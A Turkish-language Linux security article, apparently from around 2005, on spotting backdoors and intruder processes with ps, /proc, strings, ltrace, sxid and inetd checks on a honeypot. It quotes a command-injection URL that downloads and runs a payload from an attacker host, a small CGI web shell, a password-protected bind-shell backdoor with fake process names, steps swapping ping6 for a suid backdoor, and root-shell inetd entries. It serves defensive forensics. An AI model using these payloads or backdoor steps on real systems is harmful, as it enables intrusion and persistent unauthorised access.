Çok kullanıcılı sistemlerde kullanıcılara, genellikle belirli işlemleri yapması için sistem bünyesinde belirli sınırlamalar getirilir.
Bu sınırlamalar içerinde çeşitli uygulamaların(IRC server, IRC proxy vb.) çalıştırılması karşın tedbirler alınır. Fakat o kadar çok tedbir(!) alınmasına rağmen ansızın sunucunun(server) kendi kendine göçmesi(güç ve soğutma sistemi aksaklıkları dışında), bir anda bazı dizinlerde ansızın ortaya çıkan dosyalar(güvendiğiniz(!) uygulamaların oluşturdukları dosyalar hariç) fark edildiğinde yeniden tedbir alma döneminin başlangıç sinyallerini verir.

Bir sistem yöneticisinin 'durmadan sistem göçüp duruyor' şeklinde hayıflanmasının sebebi herhangi bir kullanıcının kullandığı küçük kod parçası olabilir (http://linuxreviews.org/news/2004/06/11_kernel_crash).
Kayıt verileri incelenerek(/var/log/*) sistemde meydana gelen durumları büyük ölçüde öğrenebilirsiniz. Çalışan uygulamalar hakkında detaylı bilgiyi veren komut 'ps'(process status) komutudur. Bu komut aracılığıyla sistemde çalışan yani kullanıcılar tarafından gerçekleştirilen işlemlerin listesini görebilme imkanımız vardır.
Örneğin;
firtina@FIRTINA$ ps aux
USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND
...
www-data 4059 0.0 0.0 2000 832 ? Ss 23:45 0:00 /usr/sbin/tester
root 4219 0.0 0.1 3644 1808 pts/2 S+ 23:47 0:00 sshi -l firtina FIRTINA
root 4220 0.0 0.1 14500 1980 ? Ss 23:47 0:00 sshd: firtina [priv]
..
'ps' komutu kullanıldığında kullanıcıya ait süreçlere ilişkin bilgiler sunulur. Bu bilgiler belirli bir sınıf altında verilir. Bu bilgiler arasında; uygulama kim tarafından çalıştırılmış[USER] / kullandığı bellek miktarı[%MEM] / süreç numarası[PID] / sürecin çalıştırıldığı terminal[TTY] / Sürecin o anki durumu[STAT] / çalışan uygulama[COMMAND] gibi bilgiler yer alır. İnternette saldırıya maruz kalmış bir sunucuda çalışan uygulamaların tespitinde 'ps' komutunun göstereceği sonuç ne derece güvenilirdir?
Günümüzde öyle olaylarla karşılaşılmaktadır ki saldırıya uğrayan bir web/mail sunucusuna bağlanan bir kişi saldırgan tarafından sistemde çalıştırılan bir sniffer(/paket koklayıcı/) yardımıyla gözlenip yaptığı işlemler takibe alınır. Neyi takip edecek? Neticesinde web/mail sunucuma bağlanıyorum, evimdeki ya da ofisimdeki bilgisayara mı girecek? diyebilirsiniz.
Gerçekleşen bir olayı irdeleyelim:
" Sahibi olduğu sunucuda gerekli ayarları yapmak için ofisindeki makinesinden(Linux Box) SSH ile sunucusuna bağlanır. Sunucusundaki davetsiz misafirden habersiz gerekli işlemlerini gerçekleştirir. Saldırganın sunucuda oluşturduğu snifferlog / ttylog / sshbackdoor uygulamalarıyla ofisindeki bilgisayarın root şifresi de ele geçmiştir. Çünkü sistem içine ve sistem dışına yapılan tüm bağlantılar kontrol altına alınmıştır."
Sunuculara özellikle web sunucularına gerçekleştirilen saldırıların büyük çoğunluğunda temel sebep ana sayfayı değiştirmektir. Sunucuda barındırılan .phpi , .cgi tipi betik sayfaların zaaflarından yararlanarak sistemdeki web sayfalarını değiştirme oranı son günlerde arttı.
.php / .cgi tipi sayfalar aracılığıyla sistemde komutlar çalıştırılarak, sisteme ilişkin verilerin toplanması / kullanıcı şifresi bulma / sisteme dosya aktarma gibi işlemler gerçekleştirilerek web sayfaları değiştirilir. Web sunucularında meydana gelen saldırıların(bir siteye ait web sayfasını değiştirme) büyük çoğunluğunu iyi yapılandırılmamış kullanıcı hakları, php - cgi tipi sayfalarda bulunan zaaflıklar, kolay tahmin edilebilir şifreler oluşturmaktadır.
Neticesinde uzaktan sistemde komut çalıştırmayı başaran bir saldırgan istediği dosyaları sisteme aktararak arkakapı(backdoor) oluşturmayı başardığında, uzaktan sisteme oluşturduğu arka kapı ile bağlanır.
Örneğin; [http://www.securityfocus.com/bid/9855/info]

http://www/login/?user=|%22%60cd /tmp;wget http://saldirgan/.files/0r;chmod 777 0r;./0r%60%22|

Yukarıdaki söz dizimini bir web göstericiye yazdığında saldırgan, uzaktan sistemde(cpanel) bir dizi komut çalıştırarak kendisine ait başka bir adresten arkakapıyı oluşturacak dosyayı çekip çalıştırarak sistemde açık kapı oluşmasını sağlamakta.
Sisteme ait herhangi bir kullanıcının şifresini elde eden saldırgan, sisteme tekrar bağlanmak için(özellikle kullanıcının şifresini değiştirmesi halinde) sistemde arka kapı bırakma olasılığı fazladır. Bu arka kapının türü tamamıyla saldırganın hayal gücüne kalmıştır.
Saldırganın gerçekleştirebileceği arka kapılardan bazıları:
- Belli süre zarfında içinde geçerli olacak arka kapı açma
- Herhangi bir servis açma
- Kernel arka kapıları (Kernel Backdoor)
- Dosyaların içine gizlenilen arka kapılar
- Rootkitlerin yardımıyla kurulan arka kapılar

Saldırganın amacı(hepsi için geçerli değil) sistemde olabildiğince uzun yaşamak.
Ayrıca sunucuda gezinen bir davetsiz misafir .php .cgi tipi kodlarla sistemde bir gedik oluşturabilir.
Örneğin; Aşağıdaki komut.cgi isimli dosyayı sunucunun /cgi-bin dizinine yükleyen misafir, Web göstericiler üzerinden sistemde kodlarda çalıştırabilir.
#dir.cgi
#!/bin/sh
echo Content-type: text/html
echo
echo "<.pre.>"
$*

[firtina@honeypot ~]$ lynx http://arkakapi/cgi-bin/dir.cgi?ls%20/etc

Bastille
…
bashrc
conf.linuxconf
..
Yukarıdaki örnek basitleştirilmiş bir .cgi örneğidir. Gün geçtikçe karşı sistemde, o an makine başındaymış gibi işlemlerin gerçekleştirmesini sağlayan çeşitli .php, .cgi,.pl tipi kodlar geliştirilmekte.
Örneğin, bir Perl Web Shell dosyasının sistemde olması sonucunda meydana gelen bir duruma bakalım. Sisteme erişim sadece FTP(File Transfer Protokol) ile gerçekleştirilsin. Saldırgan sisteme pws.pl dosyasını aktardığında bu dosya vasıtasıyla sisteme dışarıdan bağlanmaya çalışacaktır.

Perl Web Shell. Bu dosya vasıtasıyla sistemdeki dosyalar(yetki olanlarda) görüntülenebilir, Sistemde çeşitli komutlar çalıştırılabilir.

Dosyanın bindshell özelliğini kullanarak 11457. porttan sisteme ulaşmaya çalışır.
[honeypot@test ~]$ nmap 192.168.1.20 -p1-15000
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-07-10 00:27 EEST
Interesting ports on 192.168.1.20:
(The 14990 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
110/tcp open pop3
143/tcp open imap
11457/tcp open unknown |-- Perl Web Shell vasıtasıyla oluşturulan kapı

honeypot@test ~]$ telnet 192.168.1.20 11457 |-- Sisteme bağlanılıyor.
Trying 192.168.1.20...
Connected to 192.168.1.20 (192.168.1.20).
Escape character is '^]'.
bash: no job control in this shell
bash-3.00$
bash-3.00$ id
uid=74(apache) gid=74(apache) groups=74(apache)
bash-3.00$ pwd
/var/www/cgi-bin
bash-3.00$
bash-3.00$ bash-3.00$ cat /etc/passwd |-- sistemde çalıştırılan komut.
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/sh

pws.pl: ps -aux komutu sonucunda apache isimli kullanıcı tarafından yürütülen komuta dikkat.

Kullanıcılar çoğunlukla internetten dosya indirerek sistemlerine kurarlar. Bazen, yüklediğimiz dosyaların yaratacağı sorunları düşünmeden bunları sisteme kurarız. Nedir bu sorunlar? Kim bilir belki uzun uğraşlar sonucu sisteme indirdiğimiz dosya başkası tarafından değiştirilmiştir(Geçmiş zamanda bu tür olaylar yaşanmıştır).

[firtina@honeypot tester]$ tar zxvf dosya.tar.gz
dosya
dosya/getconn.c
dosya/Makefile
dosya/config.c
dosya/main.c
dosya/common.h
dosya/file.c

[firtina@honeypot tester]$ make
cc -Wall -g `libnet-config --cflags --defines` -c getconn.c
getconn.c: In function `getconn':
getconn.c:30: warning: implicit declaration of function `exit'
cc config.c -o config
./config & |--------- !!!!!!!!!!!!!!! DİKKAT
cc -Wall -g `libnet-config --cflags --defines` -c main.c
cc -Wall -g `libnet-config --cflags --defines` -c file.c
cc -o file getconn.o main.o file.o -L/usr/local/lib -lpcap `libnet-config --libs`

Uygulamanın derleme esnasında kullandığı ./config & satırına dikkat edelim.
Dosya içerisindeki config.c dosyası dikkatle incelendiğinde sistemde arka kapıya neden olan kod olduğu anlaşılır.

[firtina@honeypot tester]$ pico config.c
...
#define port 67 |------- !!!!!! DİKKAT
#define shell "/bin/sh"
...
execl(shell,shell,(char *)0);
...

Bu dosyanın oluşturduğu kapıyı fark eden biri:

[yabanci@sistem ~]$ telnet honeypot.sistem 67

Trying honeypot.sistem...
Connected to honeypot.sistem (xxx.xxx.xxx.xxx).
Escape character is '^]'.

id;
uid=500(firtina) gid=500(firtina) groups=81(users) |-- arka kapı sınır cizgisi

Saldırgan sistemde büyük yetkiye(root) ulaştığında bir açık kapı oluşturduğunda bu açık kapıyı sadece kendisinin kullanabileceği şekilde ayarlayabilir.
Bu ayardan kasıt, kapıya bir kilit koymasıdır. Kapının şifresi doğru ise sisteme giriş yapar, yanlış ise sisteme giriş izni verilmez. Saldırgan, sistem yöneticisinin, sistemde çalışan uygulamaları görmek istemesi durumunda sahte isimlerle karşılaşması için açık kapı bırakan uygulamalarda kod değişikliği yapabilir.
[firtina@firtina firtina]$ ssh -l fizik arkakapili.sistem
fizik@arkakapili's password:
Last login: Mon Apr 14 01:52:00 2005 from xxx.yyy.zzz.ttt
[fizik@arkakapili fizik]$ cd /tmp
[fizik@arkakapili tmp]$ mkdir .mail
[fizik@arkakapili tmp]$ cd .mail
[fizik@arkakapili .mail]$ cat > net.c
#include ..
#include ..
#define SHELL "/bin/sh"
#define SARG "-i"
#define PASSWD "ankara"
#define PORT 6767
#define FAKEPS "httpd"
#define SHELLPS "klogd"
...
int main (int argc, char *argv[])
{
...
static char *pass = PASSWD;
...

[fizik@arkakapili .mail]$ gcc -o net net.c

Bu esnada saldırgan sisteme root olarak girmek için açık kapıyı root durumda bırakmak isteyecektir. Bu nedenle normal kullanıcıdan root moduna geçmek için exploitleri deneyecektir.
[root@arkakapili .mail]# ./net &

Sistemde açık kapı bırakılmadan önce yapılan port taramasının sonucu:
[root@firtina firtina]# nmap -p 1-10000 arkakapili.sistem
Interesting ports on arkakapili.sistem (xxx.xxx.xxx.xxx):
Port State Service
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop-3
443/tcp open https
3306/tcp open mysql

Portlar incelendiğinde herşey normal gözüküyor.
Fakat açık kapı bırakıldığında portların durumunu görelim:

[root@firtina firtina]# nmap -p 1-10000 arkakapili.sistem
Interesting ports on arkakapili.sistem (xxx.xxx.xxx.xxx):
Port State Service
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop-3
443/tcp open https
3306/tcp open mysql
6767/tcp open unknown |--- ilginc bir port ;)

[firtina@firtina firtina]$ telnet arkakapili.sistem 6767
Trying xxx.xxx.xxx.xxx...
Connected to arkakapili.sistem (xxx.xxx.xxx.xxx).
Escape character is '^]'.
firtina |--- Yanlış şifre girildiğinden Connection closed by foreign host. --- uygulama baglantıyı kopardı.

[firtina@firtina firtina]$ telnet arkakapili.sistem 6767
Trying xxx.xxx.xxx.xxx...
Connected to arkakapili.sistem (xxx.xxx.xxx.xxx).
Escape character is '^]'.
ankara
klogd: no job control in this shell
[bash~]

Sistem yöneticisi çalışan uygulamalara baktığında, uygulamaların olağan uygulamalar olduğu kanısına varabilir:

[root@arkakapili root]# ps -aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.2 0.3 1412 504 ? S 01:37 0:04 init
root 2 0.0 0.0 0 0 ? SW 01:37 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SW 01:37 0:00 [kapmd]
root 4 0.0 0.0 0 0 ? SWN 01:37 0:00 [ksoftirqd_CPU0]
root 5 0.0 0.0 0 0 ? SW 01:37 0:00 [kswapd]
named 1018 0.0 1.8 10192 2324 ? S 01:38 0:00 named -u named
...
...
fizik 2777 0.0 1.2 2724 1532 pts/6 S 01:52 0:00 -bash
root 2808 0.0 1.2 2784 1588 ? S 01:52 0:00 klogd -i |--- Dikkat !!!!
root 2832 0.0 0.0 1368 104 ? S 01:52 0:00 httpd ole |--- Dikkat !!!!
root 2932 0.0 0.7 2904 960 pts/1 R 02:08 0:00 ps -aux

Ne, nerede?
Sistemde çalışan uygulamalari kim nerede çalıştırmış?
[honeypot@test ~]$ ps -aux
..
root 6879 0.0 0.0 1500 432 tty1 Ss+ 21:51 0:00 /sbin/mingetty tty1
root 6880 0.0 0.0 1504 432 tty2 Ss+ 21:51 0:00 /sbin/mingetty tty2
... root 16332 0.0 0.0 1360 308 pts/3 S 22:23 0:00 ./shushi |------ Dikkat
root 16334 0.0 0.1 2600 1616 pts/3 S+ 22:23 0:00 /bin/bash
honeypot 16582 0.0 0.1 3112 1876 pts/2 Ss 22:24 0:00 /bin/bash

16332 PID numaralı süreçte neyin nesi?
[root@test FILES]# cd /proc/16332
[root@test 16332]# ls -la
dr-xr-xr-x 4 root root 0 Tem 8 22:24 ./
dr-xr-xr-x 103 root root 0 Tem 9 2005 ../
-r-------- 1 root root 0 Tem 8 22:27 auxv
-r--r--r-- 1 root root 0 Tem 8 22:24 cmdline
lrwxrwxrwx 1 root root 0 Tem 8 22:27 cwd -> /tmp/FILES/
-r-------- 1 root root 0 Tem 8 22:27 environ
lrwxrwxrwx 1 root root 0 Tem 8 22:27 exe -> /tmp/FILES/shushi*
dr-x------ 2 root root 0 Tem 8 22:24 fd/
-rw-r--r-- 1 root root 0 Tem 8 22:27 loginuid
..
nerede(cwd) ----> /tmp/FILES
ne (exe) ----> shushi

Dosyayı inceleyelim.
[root@test 16332]# strings /tmp/FILES/shushi (dosyadaki karakter dizisine bakıyoruz)
/lib/ld-linux.so.2
_Jv_RegisterClasses
__gmon_start__
libc.so.6
printf
system
setgid
seteuid
_IO_stdin_used
..
clear
Now you are r00t!!
/bin/bash

Strings komutu sonucunda son iki satır neredeyse her şeyi açıklıyor.

[root@test home]# ltrace /tmp/FILES/shushi (ltrace ile dosya sistemde ne istediğine bakalım)

|unfinished ...|
--- SIGCHLD (Child exited) ---
|... system resumed> ) = 0
printf("Now you are r00t!!\n\n"Now you are r00t!!

) = 20
seteuid(0) = 0
setuid(0) = 0
setgid(0) = 0
system("/bin/bash"[root@test home]#

Durum belli. Dosya zaten +s ve kullanıcıya root yetkisi veriyor.

Sistemdeki +s durumundaki dosyaları taramak için:

find /bin -type f -perm +6000 -exec ls -la {} \;
-rwsr-xr-x 1 root root 20444 Şub 10 19:52 /bin/su
-rwsr-xr-x 1 root root 31180 May 18 2004 /bin/ping
-rwsr-xr-x 1 root root 94776 Mar 4 18:38 /bin/mount
-rwsr-xr-x 1 root root 30684 Mar 4 18:38 /bin/umount
find /sbin -type f -perm +6000 -exec ls -la {} \;
-r-sr-xr-x 1 root root 24583 Eyl 29 2004 /sbin/unix_chkpwd
-rwxr-sr-x 1 root root 3444 Şub 22 09:28 /sbin/netreport
-rwsr-xr-x 1 root root 21146 Eyl 29 2004 /sbin/pwdb_chkpwd
-r-s--x--x 1 root root 12152 Eyl 29 2004 /sbin/pam_timestamp_check

sxid ile sistemde suid/sgid türündeki dosyaların(değişiklikleri dahil) varlığını hissettirir.
[honeypot@test ~]$ mail
Mail version 8.1.1 6/6/93. Type ? for help.
"/var/spool/mail/honeypot": 1 message 1 new
>N 1 root@test.honeypot.o Fri Jul 8 22:58 35/903 "No changes found (persistent problems)"
& 1
…
sXid Vers : 4.0.4
Check run : Fri Jul 8 22:58:24 2005
This host : test.honeypot.__
Searching : /
Excluding : /proc /mnt /cdrom /floppy
Ignore Dirs: /home
Forbidden : /home /tmp
..
Checking for forbidden s[ug]id items:
/tmp/FILES/shushi *root:*root 6755

sxid: Belirtilen yerlerde +s tipli dosyaları takip et. [ftp://marcus.seva.net/pub/sxid]

sbdoor {Suid backdoor / SBdoor v0.2}
sbdoor kurmak için sistemde root yetkisine sahip olmak gerekir.
Bu backdoor, sistem yöneticisi yetkisine sahip kullanıcının şüpheye düşmemesi için sistemdeki +s tipi dosyanın yerine kullanılır(Backdoor kurulurken /usr/bin/ping6 dosyasının yerine kullanılır).

[firtina@test sbdoor]$ ls -la /usr/bin/ping6 |------- Sistemde bulunan gercek dosya(+s).
-rwsr-xr-x 1 root root 27052 May 18 2004 /usr/bin/ping6*

[root@test firtina]# mv /usr/bin/ping6 /usr/bin/.old |------ ping6 degistiriliyor.
[root@test firtina]# ls -la /usr/bin/.old
-rwsr-xr-x 1 root root 27052 May 18 2004 /usr/bin/.old*

[root@test sbdoor]# mv sbdoor /usr/bin/ping6 |------ backdoor, ping6 isminde kaydediliyor.
[root@test sbdoor]# chmod 4755 /usr/bin/ping6 |------ +s
[root@test sbdoor]# ls -la /usr/bin/ping6
-rwsr-xr-x 1 firtina firtina 8896 Tem 9 22:19 /usr/bin/ping6*

[firtina@test ~]$ ping6
Usage: ping6 [-LUdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface]
[-M mtu discovery hint] [-S sndbuf]
[-F flow label] [-Q traffic class] [hop1 ...] destination

[firtina@test ~]$ export nst=nsT |---- sifre tanimlaniyor(bu olmadan backdoor root hakki vermez)
[firtina@test ~]$ ping6 |---- backdoor

-== Ok we r00t! SBdoor v0.2 ==-

[root@test ~]# id |---- Kimlik ne?
uid=0(root) gid=0(root) gruplar=501(firtina)

İnceleme [honeypot@test ~]$ ps -aux
.....
root 1060 0.0 0.0 1360 296 pts/7 S 22:43 0:00 ping6
root 1061 0.0 0.1 2592 1628 pts/7 S+ 22:43 0:00 /bin/bash
....

SBdoor: Güvenilir dosya ismini öğren, Sahtesiyle gerçeğini değiştir. Güvenli bir ortam imajını sağla taktiği.

[honeypot@test FILES]$ strings /usr/bin/ping6
/lib/ld-linux.so.2
_Jv_RegisterClasses __gmon_start__ libc.so.6
setuid
GLIBC_2.0
PTRhP
[^_]
[^_]
/bin/sleep 10

unknown host
Usage: %s [-LUdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface]
[-M mtu discovery hint] [-S sndbuf]
[-F flow label] [-Q traffic class] [hop1 ...] destination
-== Ok we r00t! SBdoor v0.2 ==-
/bin/bash

Sistemdeki servislerin her zaman uslu uslu duracak halleri olmayabilir.
Sizden habersiz birileri sisteme servisler ekleme ihtimallerine karşın /etc/inetd.conf dosyasını ve /etc/xinetd.d dizini altınTda bulunan dosyaları kontrol etmek bir çok sorunu ortadan kaldırabilir.

[root@arkakapili /]cat /etc/inetd.conf
... echo 4444 stream tcp nowait root /bin/sh sh -i |-- Dikkat !!!!
...

[root@sistem /xserver]cat /etc/xinetd.d/kendim <--
...
protocol = tcp |
port = 4444 |
socket_type = stream |
wait = no |
user = root |
server = /bin/sh |--- Dikkat !!!!
server_args = -i |
...

Sistemde geçerli olan süreçleri takip etmek için "ps" komutu yeterli olsa da herhangi bir soruna karşı "ps" komutuna benzer işlemleri gerçekleştiren araçlar kullanmak sistem hakkında daha fazla bilgi verebilir. Örneğin; pstree ile uygulamalar basamaklar şeklinde gösterilir.
arge@6[tmp]$ pstree
-+- 00001 root init [5]
|--- 00002 root (migration/0)
|--- 00003 root (ksoftirqd/0)
|--- 00004 root (migration/1)
|--- 00005 root (ksoftirqd/1)
|--- 00006 root (events/0)
|--- 00007 root (events/1)
|--- 00008 root (khelper)
|-+- 00013 root (kthread)
| |--- 00029 root (kacpid)
| |--- 00138 root (kblockd/0)
| |--- 00139 root (kblockd/1)
….
| |--- 03047 root klauncher [kdeinit] klauncher
..
| |-+= 03592 root /bin/bash
| | \-+= 06704 root mc
..

Yawho(Yet Another Who) ile w(who) komutuna benzer şekilde sonuç alırsınız. Fakat detay bakımında Yawho ile daha fazla bilgi edinirsiniz.
[root@test /]# yawho [http://www.linuxdownloads.org/print.php?sid=6346]
DAEMON USER TTY SHP FROM WHAT
(init) honeypot pts/0 7321 -
(konsole) honeypot pts/1 8239 /bin/bash
(konsole) honeypot pts/5 8597 /usr/bin/mc -P /home/honeypot/tmp/mc-honeypot/mc.pwd.85
(konsole) honeypot pts/6 9848 tcpdump -i lo -X
(konsole) honeypot pts/2 16582 ssh -l honeypot 192.168.1.20
(sshd) honeypot pts/4 29610 192.168.1.20 -
...
8 users (1 local, 0 telnet, 1 ssh, 6 other)

Bu tür sistem ile ilgili araçları http://freshmeat.net isimli internet adresinden bulabilirsiniz.

Tacettin Karadeniz
tacettinkaradeniz_@_yahoo.com

__________________________